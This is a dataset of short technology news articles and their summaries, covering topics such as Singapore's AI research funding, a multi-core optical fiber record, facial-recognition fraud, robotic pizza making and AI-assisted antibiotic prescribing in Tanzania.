Dataset columns:
id: stringlengths (1 to 169)
pr-title: stringlengths (2 to 190)
pr-article: stringlengths (0 to 65k)
pr-summary: stringlengths (47 to 4.27k)
sc-title: stringclasses (2 values)
sc-article: stringlengths (0 to 2.03M)
sc-abstract: stringclasses (2 values)
sc-section_names: sequencelengths (0 to 0)
sc-sections: sequencelengths (0 to 0)
sc-authors: sequencelengths (0 to 0)
source: stringclasses (2 values)
Topic: stringclasses (10 values)
Citation: stringlengths (4 to 4.58k)
Paper_URL: stringlengths (4 to 213)
News_URL: stringlengths (4 to 119)
pr-summary-and-article: stringlengths (49 to 66.1k)
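Assuming the dataset is published on the Hugging Face Hub, the columns listed above can be loaded and inspected with the `datasets` library. This is a minimal sketch; the repository id below is a placeholder, not the dataset's real name.

```python
# Minimal sketch of loading this dataset with the Hugging Face `datasets` library.
# The repository id is an assumption/placeholder -- substitute the actual id.
from datasets import load_dataset

ds = load_dataset("example-org/press-release-summaries", split="train")

row = ds[0]
print(row["pr-title"])              # press-release headline
print(row["pr-summary"][:200])      # human-written summary of the press release
print(len(row["pr-article"]))       # length of the full press-release text
print(row["source"], row["Topic"])  # provenance and topic labels
```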
126
Singapore Launching $50 Million Program to Advance Research on AI, Cybersecurity
SINGAPORE - Singapore plans to invest $50 million in a program to support research on AI and cybersecurity for future communications structures, Deputy Prime Minister Heng Swee Keat announced on Tuesday. As part of the Future Communications Research & Development Programme, Singapore plans to set up new communications testbeds in 5G and beyond-5G, support technology development, and build up a local talent pool. 5G refers to the fifth generation of high-speed mobile internet that aims to provide faster data speeds and more bandwidth to carry growing levels of web traffic. Many new technologies, such as self-driving cars, are underpinned by rapid developments and global deployment of 5G networks. For its part, Singapore plans to have full island-wide standalone 5G coverage by 2025. The program will "support AI and cybersecurity research for next-generation communications infrastructures," Heng said at the Asia Tech x Singapore conference. It will "support testbeds for innovative pilots, and provide scholarships for those seeking to pursue research in communications."
Singapore's Deputy Prime Minister Heng Swee Keat announced that the city-state intends to invest $50 million in research on artificial intelligence and cybersecurity for next-generation communication infrastructures. The goals of Singapore's Future Communications Research & Development Program include establishing communications testbeds for 5G and beyond-5G, supporting the development of new technologies, and cultivating local talent. The island nation also will launch the Singapore Trade Data Exchange, a venue that will enable multiple stakeholders (logistics players, shippers, and buyers) to share data that will reportedly be encrypted and transmitted without being stored. The Singapore Financial Data Exchange, launched last year, lets users sign in with their national digital identity to access their consolidated financial data from enrolled banks and pertinent government agencies.
[]
[]
[]
scitechnews
None
None
None
None
127
Demonstration of World Record: 319 Tb/s Transmission Over 3,001 km with 4-Core Optical Fiber
New optical fiber
Currently, standard single-core single-mode fiber, which is widely used for medium- and long-distance communication, is considered to have a capacity limit of about 100 terabits per second in the conventional C- and L-bands and 200-300 terabits per second if adopting additional bands. In order to further increase transmission capacity, research on multi-core fibers with more cores (light paths) and multi-mode fibers has been performed extensively in recent years.
Researchers at Japan's National Institute of Information and Communications Technology (NICT) successfully conducted the first S-, C-, and L-band transmission over a world-record 3,001 kilometers (1,864.7 miles) using a 4-core optical fiber. The combined 20-nanometer-plus transmission bandwidth supported 552 wavelength-division multiplexed channels by adopting two classes of doped-fiber amplifier in conjunction with distributed Raman amplification to facilitate the wideband signal's recirculating transmission. Standard cladding diameter allows the cabling of 4-core optical fiber to be integrated with existing gear. The NICT researchers hope this will yield practical high data-rate transmission, and help to realize a backbone communications infrastructure that supports data services beyond the capabilities of 5G.
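The headline figures above (319 Tb/s in total, 552 WDM channels, 4 cores, 3,001 km) imply some useful back-of-the-envelope rates. The sketch below only rearranges those quoted numbers; note that the text does not say whether the 552 channels are counted per core or across all four cores, so the per-channel figure is illustrative.

```python
# Back-of-the-envelope rates implied by the quoted figures
# (319 Tb/s total, 552 WDM channels, 4 cores, 3,001 km).
total_tbps = 319.0
channels = 552        # WDM channels (per-core vs. total not specified above)
cores = 4
distance_km = 3001

per_channel_gbps = total_tbps * 1_000 / channels   # ~578 Gb/s per channel
per_core_tbps = total_tbps / cores                 # ~79.8 Tb/s per core
capacity_distance = total_tbps * distance_km       # ~9.6e5 (Tb/s)*km

print(f"per channel: {per_channel_gbps:.0f} Gb/s")
print(f"per core:    {per_core_tbps:.1f} Tb/s")
print(f"capacity-distance product: {capacity_distance:.2e} (Tb/s)*km")
```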
[]
[]
[]
scitechnews
None
None
None
None
128
Faces Are the Next Target for Fraudsters
Facial-recognition systems, long touted as a quick and dependable way to identify everyone from employees to hotel guests, are in the crosshairs of fraudsters. For years, researchers have warned about the technology's vulnerabilities, but recent schemes have confirmed their fears - and underscored the difficult but necessary task of improving the systems.
Facial recognition systems increasingly are a target for fraudsters. Identity verification company ID.me Inc. found more than 80,000 attempts to trick facial identification verification to claim fraudulent unemployment benefits between June 2020 and January 2021. ID.me's Blake Hall said these attempts involved people wearing masks, using deepfakes, or holding up images or videos of other people. Veridium LLC's John Spencer said fraudsters sometimes try to carry out "presentation attacks" by using a photo of someone's face, cutting out the eyes and using it as a mask. Adversa.ai's Alex Polyakov said the algorithms underpinning these systems need to be updated, or the models need to be trained with a large number of adversarial examples, to protect against such spoofing.
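Polyakov's suggestion of retraining models on adversarial examples refers to a standard hardening technique. Below is a minimal, hedged sketch of the fast gradient sign method (FGSM), one common way such examples are generated; `model` stands for any differentiable PyTorch image classifier and is not a system named in the article.

```python
# Sketch: generating an adversarial example with FGSM (assumes PyTorch).
# `model` is a placeholder for any differentiable classifier; epsilon bounds
# the per-pixel perturbation.
import torch
import torch.nn.functional as F

def fgsm_example(model, image, label, epsilon=0.03):
    """Return a copy of `image` perturbed to increase the classifier's loss."""
    image = image.clone().detach().requires_grad_(True)
    loss = F.cross_entropy(model(image), label)
    loss.backward()
    # Nudge every pixel in the direction that raises the loss, then clamp
    # back into the valid [0, 1] image range.
    adversarial = image + epsilon * image.grad.sign()
    return adversarial.clamp(0.0, 1.0).detach()

# Adversarial training mixes such perturbed images back into the training set,
# which is the kind of model update the article describes.
```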
[]
[]
[]
scitechnews
None
None
None
None
129
Technology Brings Interest, Crowds to 'Closed' Theaters
For many people involved in the theater, the past year has been difficult. For others, coronavirus closures have provided new opportunities using technology. Britain's Royal Shakespeare Company is one example. Even before COVID-19 restrictions closed theaters, the company had shared recorded performances as movies. This helped people who could not get to London or New York City to see the live shows. The pandemic has turned even the smallest theaters into producers of streamed programs. These are available on the internet outside of their local communities. For some theater lovers, a screen cannot replace a live performance. But some observers predict that online theater is here to stay. And a generation that has grown up with computers and mobile phones might like it better than live theater. The Royal Shakespeare Company, or RSC, has said it is combining online media skills with traditional art. Mixed reality productions let actors work with digital versions of 16th century writer William Shakespeare's more unusual characters. And digital events have invited people worldwide to add to the action from their computers. Sarah Ellis is director of digital development at the RSC. She told Reuters news agency that the company is doing its research and development right now. "If we look at what the pandemic did," it broke open the future, she said. Ellis noted that digital tools have helped reach a lot of people around the world and this creates many possibilities. Public opinion research by the RSC during the coronavirus health crisis found that people were willing to pay for digital performances. And people said they were willing to watch the shows online even when theaters reopened.
Magical switcher
Theaters work hard to bring to life the tension of a story on stage. That used to mean employing costly technical crews. But a few months before the pandemic brought restrictions, a valuable piece of equipment became available. The device is known as a switcher. One switcher causing excitement right now is the ATEM Mini. It costs just $295. This switcher is produced by Blackmagic Design, an Australian company that has worked with the RSC. Blackmagic has also provided technology for the movie "Avatar" and the series "Game of Thrones." The device lets a video recording switch between up to four different cameras. That means a single performance can have the many different camera angles seen in movies and television shows. It also permits quick editing, so performances can be shared quickly online. Blackmagic founder Grant Petty said he wanted to help creative people by providing easy-to-use technology. He said when he first got into the industry, businesspeople were controlling everything. Creative people were being excluded from decision-making. "I just felt that was wrong," he said, adding, if the equipment was less costly, it would "empower creative people."
Rising from the ruins
Theatre Charlotte is a small theater that has used the switcher. It has streamed shows to people across the United States and Canada. It is North Carolina's longest continually producing community theater. But a fire last year damaged its 80-year-old headquarters. Acting Executive Director Chris Timmons said the company has rediscovered that theater is more than just a building. He expects to keep streaming even after Theatre Charlotte rebuilds next year. And he said he can imagine a younger generation less interested in the traditions of pre-performance dinners and after-show drinks. Timmons said there is surely room for both kinds of crowds. Colvin Theater is a theater production group based in Grand Rapids, Michigan. Founder Cody Colvin says many productions lose money even when the economy is good and streaming can help that. "We're going to hit a point where selling tickets is not going to pay the bills anymore," he said. Theater will become like sports and humor shows, where there will be a live crowd paying a lot of money to go to the event, he said. And then it will be broadcast online for people who want to pay less. He said that is the only way to grow. The live experience will still be hard to beat, however. Neil Darlison is director of theater at Arts Council England, a government arts agency in Britain. He said the council supports the use of digital tools to reach more people. But the desire for live theater is still strong. Darlison said he does not think streaming is going to be as much of a problem for live theater as it may be for films or music shows. What sets theater apart is "the collective experience," he said, which is much harder to reproduce digitally. I'm Alice Bryant.
opportunity -n. an amount of time or a situation in which something can be done; a chance to do or gain something
stream -v. to play continuously as data is sent to a computer over the internet
screen -n. the flat part of a television or computer that shows images or text
digital -adj. using computer technology; created through electronic devices, not physically real
character -n. a person or being who appears in a story, book, play, movie or television show
stage -n. a raised structure in a theater or similar building where performers stand
angle -n. the position from which something is looked at; for example, a camera angle
edit -v. to prepare a film, recording, photography or other work by changing, moving or removing parts
bill -n. a document stating how much is owed for goods or services
Britain's Royal Shakespeare Company (RSC) is an example of how theaters closed by the coronavirus pandemic have adopted technology to support new forms of performance art. The company said it is combining online media skills with traditional art to create mixed-reality productions, and inviting people to participate virtually in its digital events. The RSC's Sarah Ellis said the global nature of digital tools offers many possibilities. Public opinion research has shown people were willing to pay for digital performances during the pandemic, and would continue watching such productions online after theaters reopened. Cody Colvin with the Michigan-based Colvin Theater production group anticipates streaming will be essential to theaters that lose money on productions even when the economy is good.
[]
[]
[]
scitechnews
None
None
None
None
131
WHO Releases AI Guidelines for Health
A new report from the World Health Organization (WHO) offers guidance for the ethical use of artificial intelligence (AI) in the health sector. The six primary principles for the use of AI as set forth in the report are to protect autonomy; promote human well-being, safety, and the public interest; ensure transparency, explainability, and intelligibility; foster responsibility and accountability; ensure inclusiveness and equity; and promote responsive and sustainable AI. These principles are intended as a foundation for AI stakeholders, including governments, developers, and society. The report,
[]
[]
[]
scitechnews
None
None
None
None
132
Pandemic Wave of Automation May Be Bad News for Workers
Technological investments that were made in response to the crisis may contribute to a post-pandemic productivity boom, allowing for higher wages and faster growth. But some economists say the latest wave of automation could eliminate jobs and erode bargaining power, particularly for the lowest-paid workers, in a lasting way. "Once a job is automated, it's pretty hard to turn back," said Casey Warman, an economist at Dalhousie University in Nova Scotia who has studied automation in the pandemic. The trend toward automation predates the pandemic, but it has accelerated at what is proving to be a critical moment. The rapid reopening of the economy has led to a surge in demand for waiters, hotel maids, retail sales clerks and other workers in service industries that had cut their staffs. At the same time, government benefits have allowed many people to be selective in the jobs they take. Together, those forces have given low-wage workers a rare moment of leverage, leading to higher pay, more generous benefits and other perks. Automation threatens to tip the advantage back toward employers, potentially eroding those gains. A working paper published by the International Monetary Fund this year predicted that pandemic-induced automation would increase inequality in coming years, not just in the United States but around the world. "Six months ago, all these workers were essential," said Marc Perrone, president of the United Food and Commercial Workers, a union representing grocery workers. "Everyone was calling them heroes. Now, they're trying to figure out how to get rid of them."
Some economists are warning that an acceleration of the pandemic-driven adoption of automation could eliminate jobs and permanently erode bargaining power, especially for the lowest-paid workers. An Atlanta-based Checkers fast-food franchise, for example, contracted with Colorado startup Valyant AI to deploy automated voice ordering at its drive-through. The economic reopening has caused demand for service-industry workers to surge, and low-wage workers can negotiate higher pay and better benefits. However, a study by Massachusetts Institute of Technology researchers found that the pandemic has almost certainly exacerbated U.S. wage inequality, a trend that automation has been fueling over the last 40 years.
[]
[]
[]
scitechnews
None
None
None
None
133
Paris Welcomes First Pizzeria Operated by Robots
Pazzi, the first fully robotic pizzeria, has opened in Paris' Beaubourg neighborhood after eight years of development and refinement. Pazzi's robot staff oversees all aspects of pizza preparation, from taking orders to prepping the dough to boxing the pizzas. Pazzi's Thierry Graffagnino said because pizza dough is particularly challenging to handle, "We had to give the robot the means to make these corrections on its own, and some pizza makers can't even manage that themselves." Said Pazzi robot co-inventor Sebastien Roverso, "We are in a very fast process, with a perfect control of time, a control of quality since we have a constancy offered by robotics, and then an environment that is quite cool and relaxed. The idea is also to spend a few pleasant minutes watching the robot while you wait for your pizza to be made."
[]
[]
[]
scitechnews
None
None
None
None
134
Algorithms Give Digital Images More Realistic Color
1 July 2021
Method could help improve color for electronic displays and create more natural LED lighting
WASHINGTON - If you've ever tried to capture a sunset with your smartphone, you know that the colors don't always match what you see in real life. Researchers are coming closer to solving this problem with a new set of algorithms that make it possible to record and display color in digital images in a much more realistic fashion. "When we see a beautiful scene, we want to record it and share it with others," said Min Qiu, leader of the Laboratory of Photonics and Instrumentation for Nano Technology (PAINT) at Westlake University in China. "But we don't want to see a digital photo or video with the wrong colors. Our new algorithms can help digital camera and electronic display developers better adapt their devices to our eyes."
Caption: The new approach for digitizing color can be applied to cameras, displays and LED lighting. Because the color space studied isn't device dependent, the same values should be perceived as the same color even if different devices are used. Pictured is a corner of the optical setup built by the researchers. Credit: Min Qiu's PAINT research group, Westlake University
In Optica, The Optical Society's (OSA) journal for high-impact research, Qiu and colleagues describe a new approach for digitizing color. It can be applied to cameras and displays - including ones used for computers, televisions and mobile devices - and used to fine-tune the color of LED lighting. "Our new approach can improve today's commercially available displays or enhance the sense of reality for new technologies such as near-eye displays for virtual reality and augmented reality glasses," said Jiyong Wang, a member of the PAINT research team. "It can also be used to produce LED lighting for hospitals, tunnels, submarines and airplanes that precisely mimics natural sunlight. This can help regulate circadian rhythm in people who are lacking sun exposure, for example."
Mixing digital color
Digital colors such as the ones on a television or smartphone screen are typically created by combining red, green and blue (RGB), with each color assigned a value. For example, an RGB value of (255, 0, 0) represents pure red. The RGB value reflects a relative mixing ratio of three primary lights produced by an electronic device. However, not all devices produce this primary light in the same way, which means that identical RGB coordinates can look like different colors on different devices. There are also other ways, or color spaces, used to define colors, such as hue, saturation, value (HSV) or cyan, magenta, yellow and black (CMYK). To make it possible to compare colors in different color spaces, the International Commission on Illumination (CIE) issued standards for defining colors visible to humans based on the optical responses of our eyes. Applying these standards requires scientists and engineers to convert digital, computer-based color spaces such as RGB to CIE-based color spaces when designing and calibrating their electronic devices. In the new work, the researchers developed algorithms that directly correlate digital signals with the colors in a standard CIE color space, making color space conversions unnecessary. Colors, as defined by the CIE standards, are created through additive color mixing. This process involves calculating the CIE values for the primary lights driven by digital signals and then mixing those together to create the color. To encode colors based on the CIE standards, the algorithms convert the digital pulsed signals for each primary color into unique coordinates for the CIE color space. To decode the colors, another algorithm extracts the digital signals from an expected color in the CIE color space. "Our new method maps the digital signals directly to a CIE color space," said Wang. "Because such color space isn't device dependent, the same values should be perceived as the same color even if different devices are used. Our algorithms also allow other important properties of color such as brightness and chromaticity to be treated independently and precisely."
Caption: Researchers developed algorithms that correlate digital signals with colors in a standard CIE color space. The video shows how various colors are created in the CIE 1931 chromatic diagram by mixing three colors of light. Credit: Min Qiu's PAINT research group, Westlake University
Creating precise colors
The researchers tested their new algorithms with lighting, display and sensing applications that involved LEDs and lasers. Their results agreed very well with their expectations and calculations. For example, they showed that chromaticity, which is a measure of colorfulness independent of brightness, could be controlled with a deviation of just ~0.0001 for LEDs and 0.001 for lasers. These values are so small that most people would not be able to perceive any differences in color. The researchers say that the method is ready to be applied to LED lights and commercially available displays. However, achieving the ultimate goal of reproducing exactly what we see with our eyes will require solving additional scientific and technical problems. For example, to record a scene as we see it, color sensors in a digital camera would need to respond to light in the same way as the photoreceptors in our eyes. To further build on their work, the researchers are using state-of-the-art nanotechnologies to enhance the sensitivity of color sensors. This could be applied for artificial vision technologies to help people who have color blindness, for example.
Paper: N. Tang, L. Zhang, J. Zhou, J. Yu, B. Chen, Y. Peng, X. Tian, W. Yan, J. Wang and M. Qiu, "Nonlinear Color Space Coded by Additive Digital Pulses," Optica, 8, 7, 977-983 (2021). DOI: https://doi.org/10.1364/OPTICA.422287
About Optica
Optica is an open-access journal dedicated to the rapid dissemination of high-impact peer-reviewed research across the entire spectrum of optics and photonics. Published monthly by The Optical Society (OSA), Optica provides a forum for pioneering research to be swiftly accessed by the international community, whether that research is theoretical or experimental, fundamental or applied. Optica maintains a distinguished editorial board of more than 60 associate editors from around the world and is overseen by Editor-in-Chief Prem Kumar, Northwestern University, USA. For more information, visit Optica.
About The Optical Society
The Optical Society (OSA) is dedicated to promoting the generation, application, archiving, and dissemination of knowledge in optics and photonics worldwide. Founded in 1916, it is the leading organization for scientists, engineers, business professionals, students, and others interested in the science of light. OSA's renowned publications, meetings, online resources, and in-person activities fuel discoveries, shape real-life applications and accelerate scientific, technical, and educational achievement.
New algorithms can facilitate the capture and display of digital images with more realistic color, thanks to engineers at the Laboratory of Photonics and Instrumentation for Nano Technology (PAINT) at China's Westlake University. The algorithms eliminate color space conversions by directly correlating digital signals with the colors in a standard International Commission on Illumination color space. One program renders the digital pulsed signals for each primary color as unique coordinates for the color space; another algorithm decodes the colors by extracting the digital signals from an expected color in the color space. Said PAINT's Jiyong Wang, "Our algorithms also allow other important properties of color, such as brightness and chromaticity, to be treated independently and precisely."
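For context, the device-independent CIE space the researchers target is normally reached from device RGB through a standard conversion. The paper's pulse-coding algorithms are not reproduced here; the sketch below shows only the textbook sRGB-to-CIE-XYZ transform and the xy chromaticity coordinates (the quantity whose deviation is quoted as ~0.0001 above).

```python
# Sketch of the standard sRGB -> CIE 1931 XYZ -> xy chromaticity pipeline.
# This is the conventional conversion the new approach avoids, not the
# authors' pulse-coded algorithm.

def srgb_to_xyz(r, g, b):
    """Convert 8-bit sRGB values to CIE XYZ (D65 white point)."""
    def linearize(c):
        c /= 255.0
        return c / 12.92 if c <= 0.04045 else ((c + 0.055) / 1.055) ** 2.4

    rl, gl, bl = (linearize(v) for v in (r, g, b))
    x = 0.4124 * rl + 0.3576 * gl + 0.1805 * bl
    y = 0.2126 * rl + 0.7152 * gl + 0.0722 * bl
    z = 0.0193 * rl + 0.1192 * gl + 0.9505 * bl
    return x, y, z

def chromaticity(x, y, z):
    """CIE xy chromaticity: colorfulness independent of brightness (Y)."""
    total = x + y + z
    return (x / total, y / total) if total else (0.0, 0.0)

X, Y, Z = srgb_to_xyz(255, 0, 0)   # pure sRGB red, i.e. RGB (255, 0, 0)
print(chromaticity(X, Y, Z))       # ~ (0.640, 0.330)
```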
[]
[]
[]
scitechnews
None
None
None
None
135
Tech Workers Are Preparing to Quit. Persuading Them to Stay Won't Be Easy
New research suggests that less than a third of tech workers plan to stay on in their current role - leaving organizations facing an exodus of digital skills as they emerge from the pandemic. A survey of 1,000 technology workers and 500 IT decision makers by careers platform CWJobs found that just 29% of employees intend to stay with their current employer for the next 12 months, with the majority planning to make career or lifestyle changes as life opens up again. CWJobs' research found that 14% of tech workers would look for a new role at a different company, with others planning to establish their own business (11%), go part-time (11%), change locations (11%) or become a contractor (10%). Eight percent are contemplating leaving tech altogether. CWJobs' study offers yet another indicator that employers face a skills shortage in the coming months as employees make post-pandemic career moves. Tech departments were called upon to keep organizations moving forward as COVID-19 upended traditional business models and brought about the need for radical new ways of working. Developers and IT professionals bore the brunt of this, tasked with maintaining business continuity, introducing new digital services and navigating the industry-wide adoption of remote work in the space of a few short weeks. But as lockdown restrictions ease and organizations draw up their plans for the coming months, employers face what has been dubbed 'The Great Resignation' as employees - who have spent the past 16 months reflecting on their personal and professional priorities - prepare to move on. Research by HR software company Personio in May found that 38% of workers in the UK & Ireland plan to change roles in the next 6-12 months, rising to 58% amongst those in IT and computing roles. A survey of more than 30,000 global workers by Microsoft indicated that as many as 41% are considering leaving their job within a year. The UK's exit from the European Union makes things even more precarious for UK employers, squeezing the talent pipeline by making it more difficult for hiring managers to recruit skilled tech workers from overseas. Almost half of UK businesses (46%) told CWJobs they struggle to hire the technical skills they need, with 61% saying Brexit has made this even more difficult. As a result, over half (54%) said the skills gap has placed greater pressure on their technology workforce. Tom Lovell, managing director of tech skills at trade association techUK, said tech workers remained "crucial in building back the economy" as businesses emerged from the pandemic and demand for digital skills grew. "The UK has always had a historically strong technology industry, which has only been amplified by the pandemic. However, with mass movement expected, now is the time for businesses to focus on attracting and retaining top tech talent across the country," said Lovell. IT and technology workers have faced vastly increased workloads over the past 16 months, with burnout becoming a major issue amongst those tasked with propping up IT infrastructure and delivering new digital services. CWJobs' research found that, while tech workers felt their efforts over previous months had been appreciated, they believed this gratitude would fade as the pandemic subsided. Three-fifths of tech workers surveyed (62%) said they had felt more valued during the pandemic, while 52% said they experienced a boost to their job satisfaction over the past year. Yet four in 10 (38%) worried their role would be less valued as business continuity became less of a priority, with the same proportion believing their job satisfaction would decrease. Adrian Love, European recruitment director at Accenture, warned that a mass exodus of tech professionals risked putting digitization projects on ice at a time when investment in technology was accelerating. "After the last 18 months, employers are certainly aware of how crucial their tech workers are and are under no illusions when it comes to the importance of retaining tech talent," Love told ZDNet. "Tech skills across the board, but particularly in cloud, security, cyber, data and AI will continue to be highly sought after beyond the pandemic." Better pay and more flexible working arrangements could prove key to attracting and retaining skilled workers. Nearly two-thirds (63%) of tech workers surveyed by CWJobs said they wanted flexible working from their role, while 31% said they wanted a pay rise within the next 12 months. The same proportion said they wanted their organization to offer more mental health support. To avoid losing tech talent, companies must offer salaries and benefits packages that reflect the value they bring, said Dominic Harvey, director at CWJobs. "The pandemic has transformed the tech department's reputation, which is now seen as a fundamental driver of business success, and is valued by the board more than ever." At the same time as businesses risk losing prized tech workers, IT leaders face a number of hiring challenges when attempting to recruit new staff. Just over half (51%) of companies surveyed felt the competition for tech talent from other companies was too strong, while 46% reported difficulties in finding the specialist skills required for their teams. Internal capacity is also a problem for many, the study found: 46% of the IT leaders surveyed by CWJobs said HR teams lacked the tech knowledge required to make the right hires, while 43% said they struggled to recruit new talent at the pace required. Love said there was no "silver bullet solution" to the impending skills shortage, but noted that employees were more likely to engage with organizations that demonstrated a meaningful purpose, provided clear career progression, and offered an inclusive employee experience. Love also suggested that employers would need to re-think their approach to hiring to ensure they made the right decisions and maximized their potential to attract skilled technology workers. "All of this cannot just come from the recruitment teams or HR; it has to be a business-wide strategy," he told ZDNet. "Businesses must work together with their hiring teams, committing to a solid plan, leaning into the end-to-end process and together thinking about how to attract, engage, assess and onboard broader pools of potential talent than ever before."
A survey of 1,000 technology workers and 500 IT decision makers by U.K. IT jobs board CWJobs found that only 29% of employees surveyed plan to remain at their current jobs for the next 12 months. When asked about their plans, 14% of tech workers said they would seek a new role at a different company, 11% planned to start their own business, 11% planned to go part-time, 11% planned to change locations, 10% planned to become a contractor, and 8% are considering a departure from the tech industry. Nearly two-thirds (63%) of tech workers surveyed said they desire flexible working arrangements, while another third (31%) would be seeking a pay raise in the coming year. To address the impending skills shortage, Accenture's Adrian Love said, "Businesses must work together with their hiring teams, committing to a solid plan, leaning into the end-to-end process, and together thinking about how to attract, engage, assess, and onboard broader pools of potential talent than ever before."
[]
[]
[]
scitechnews
None
None
None
None
A survey of 1,000 technology workers and 500 IT decision makers by U.K. IT jobs board CWJobs found that only 29% of employees surveyed plan to remain at their current jobs for the next 12 months. When asked about their plans, 14% of tech workers said they would seek a new role at a different company, 11% planned to start their own business, 11% planned to go part-time, 11% planned to change locations, 10% planned to become a contractor, and 8% are considering a departure from the tech industry. Nearly two-thirds (63%) of tech workers surveyed said they desire flexible working arrangements, while another third (31%) would be seeking a pay raise in the coming year. To address the impending skills shortage, Accenture's Adrian Love said, "Businesses must work together with their hiring teams, committing to a solid plan, leaning into the end-to-end process, and together thinking about how to attract, engage, assess, and onboard broader pools of potential talent than ever before." New research suggests that less than a third of tech workers plan to stay on in their current role - leaving organizations facing an exodus of digital skills as they emerge from the pandemic. A survey of 1,000 technology workers and 500 IT decision makers by careers platform CWJobs found that just 29% of employees intend on staying with their current employer for the next 12 months, with the majority planning to make career or lifestyle changes as life opens up again. CWJob's research found that 14% of tech workers would look for a new role at a different company, with others planning to establish their own business (11%), go part-time (11%), change locations (11%) or become a contractor (10%). Eight percent are contemplating leaving tech altogether. SEE: Best Microsoft technical certifications in 2021: Top exams CWJob's study offers yet another indicator that employers face a skills shortage in the coming months as employees make post-pandemic career moves. Tech departments were called upon to keep organizations moving forward as COVID-19 upended traditional businesses models and brought about the need for radical new ways of working. Developers and IT professionals bore the brunt of this, tasked with maintaining business continuity, introducing new digital services and navigating the industry-wide adoption of remote work in the space of a few short weeks. But as lockdown restrictions ease and organizations draw up their plans for the coming months, employers face what has been dubbed 'The Great Resignation' as employees - who have spent the past 16 months reflecting on their personal and professional priorities - prepare to move on. Research by HR software company Personio in May found that 38% of workers in the UK & Ireland plan to change roles in the next 6-12 months, rising to 58% amongst those in IT and computing roles. A survey of more than 30,000 global workers by Microsoft indicated that as many as 41% are considering leaving their job within a year. The UK's exit from the European Union makes things even more precarious for UK employers, squeezing the talent pipeline by making it more difficult for hiring managers to recruit skilled tech workers from overseas. SEE: Low-code development is helping businesses adapt to the 'double whammy' of Brexit and COVID (TechRepublic) Almost half of UK businesses (46%) told CWJobs they struggle to hire the technical skills they need, with 61% saying Brexit has made this even more difficult. 
As a result, over half (54%) said the skills gap has placed greater pressure on their technology workforce. Tom Lovell, managing director of tech skills at trade association techUK, said tech workers remained "crucial in building back the economy" as businesses emerged from the pandemic and demand for digital skills grew. "The UK has always had a historically strong technology industry, which has only been amplified by the pandemic. However, with mass movement expected, now is the time for businesses to focus on attracting and retaining top tech talent across the country," said Lovell. IT and technology workers have faced vastly increased workloads over the past 16 months, with burnout becoming a major issue amongst those tasked with propping up IT infrastructure and delivering new digital services. CWJobs' research found that, while tech workers felt their efforts over previous months had been appreciated, they believed this gratitude would fade in the light of day as the pandemic subsided. Three-fifths of tech workers surveyed (62%) said they had felt more valued during the pandemic, while 52% said they experienced a boost to their job satisfaction over the past year. Yet four in 10 (38%) worried their role would be less valued as business continuity became less of a priority, with the same proportion believing their job satisfaction would decrease. Adrian Love, European recruitment director at Accenture, warned that a mass exodus of tech professionals risked putting digitization projects on ice at a time when investment in technology was accelerating. "After the last 18 months, employers are certainly aware of how crucial their tech workers are and are under no illusions when it comes to the importance of retaining tech talent," Love told ZDNet. "Tech skills across the board, but particularly in cloud, security, cyber, data and AI will continue to be highly sought after beyond the pandemic." Better pay and more flexible working arrangements could prove key to attracting and retaining skilled workers. SEE: The future of the office will surprise you. And if it doesn't, something has gone wrong Nearly two-thirds (63%) of tech workers surveyed by CWJobs said they wanted flexible working from their role, while 31% said they wanted a pay rise within the next 12 months. The same proportion said they wanted their organization to offer more mental health support. To avoid losing tech talent, companies must offer salaries and benefits packages that reflect the value they bring, said Dominic Harvey, director at CWJobs. "The pandemic has transformed the tech department's reputation, which is now seen as a fundamental driver of business success, and is valued by the board more than ever." At the same time as businesses risk losing prized tech workers, IT leaders face a number of hiring challenges when attempting to recruit new staff. Just over half (51%) of companies surveyed felt the competition for tech talent from other companies was too strong, while 46% reported difficulties in finding the specialist skills required for their teams. Internal capacity is also a problem for many, the study found: 46% of the IT leaders surveyed by CWJobs said HR teams lacked the tech knowledge required to make the right hires, while 43% said they struggled to recruit new talent at the pace required. 
SEE: Best coding bootcamps in 2021: Reputable coding camps Love said there was no "silver bullet solution" to the impending skills shortage, but noted that employees were more likely to engage with organizations that demonstrated a meaningful purpose, provided clear career progression, and offered an inclusive employee experience. Love also suggested that employers would need to re-think their approach to hiring to ensure they made the right decisions and maximized their potential to attract skilled technology workers. "All of this cannot just come from the recruitment teams or HR; it has to be a business-wide strategy," he told ZDNet. "Businesses must work together with their hiring teams, committing to a solid plan, leaning into the end-to-end process and together thinking about how to attract, engage, assess and onboard broader pools of potential talent than ever before."
136
Antibiotics Use in Africa: ML vs. Magic Medicine
"I was surprised myself recently when we had a child in the consultation room and I thought 'This looks like a bacterial infection,'" recalls Godfrey Kavishe, a doctor at the National Institute for Medical Research in Tanzania. Kavishe was a few steps away from prescribing an antibiotic - they help fight bacterial infections. He kept wondering, though, why the child was breathing so quickly. So, he ran "point-of-care" tests, using an artificial intelligence tool called ePOCT+. "And the tool suggested that the child was more likely to have a viral pneumonia," says Kavishe. "I probably would have given an antibiotic. The tool was really helpful." An antibiotic, meanwhile, wouldn't have helped at all. In fact, antibiotics can do more harm than good when they are wrongly prescribed. For a start, researchers have long suggested that the more we use antibiotics , the less effective they are against infections. Then there's the cost of - essentially - wasted medication. They just don't work against viruses. It's money down the drain. "They can also prolong an illness," says Kavishe. "Maybe the child doesn't have diarrhea, but you give them an antibiotic and it causes diarrhea as a side effect." Kavishe is one of a number of primary healthcare workers who have been collaborating with a Swiss-based research project called DYNAMIC . The team behind DYNAMIC say they want to improve healthcare for children aged 0 to 15 years in African countries. And part of that goal is to reduce the use of antibiotics to treat illnesses that don't respond to them, such as viral infections. "Before COVID, most of the world didn't understand the difference between a virus and a bacterium, people had yet to grasp that most diseases are viral and that patients do not benefit from an antibiotic treatment," says DYNAMIC's project lead, Valérie D'Acremont at Unisanté in Lausanne. D'Acremont says the problem is universal. Antibiotics get over-prescribed everywhere. "There is a tendency even in Europe that as soon as you have a cough, a GP will give you an antibiotic. But they should only use antibiotics for serious cases, like a bacterial pneumonia," she D'Acremont. The situation in African countries is different, because some diseases are more prevalent there than in the richer, so-called "global north." "Antibiotics get used for fever, because fever is very worrying. As soon as you have a fever, especially in the 'global south,' where you have dangerous tropical diseases like malaria , meningitis or typhoid, clinicians get very nervous and they want to be on the safe side, so they prescribe an antibiotic," she says. It's something that Kavishe sees first-hand at the Mbeya Medical Research Center in Tanzania where he works. "About 70% of consultations in primary health facilities involve children, who are brought in with fever or a cough," Kavishe says. "And most infections in children are viral - an upper respiratory tract infection, for example. But the clinician will end up giving an antibiotic to treat a diagnosis that they probably don't even know because [they haven't been able to do] many of the tests that would confirm the diagnosis." Often it's through no direct fault of their own but a simple lack of 